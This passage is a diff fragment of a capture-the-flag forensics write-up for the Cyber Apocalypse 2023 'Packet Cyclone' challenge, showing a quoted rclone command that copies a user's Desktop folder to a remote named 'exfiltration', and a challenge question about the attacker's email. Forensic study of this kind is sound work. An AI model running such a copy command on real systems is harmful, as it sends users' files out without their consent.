0x30783137/CTF-Writeups/cyber-apocalypse-2023/forensics/packet_cyclone/index.md

 rclone copy C:\\Users\\Wade\\Desktop\\Relic_location\\ remote:exfiltration -v
 ```

-According to challenge description let's launch instance and answer the question to get the flag
+According to challenge description let's launch instance and answer the questions to get the flag

 ```bash
 What is the email of the attacker used for the exfiltration process? (for example: name@email.com)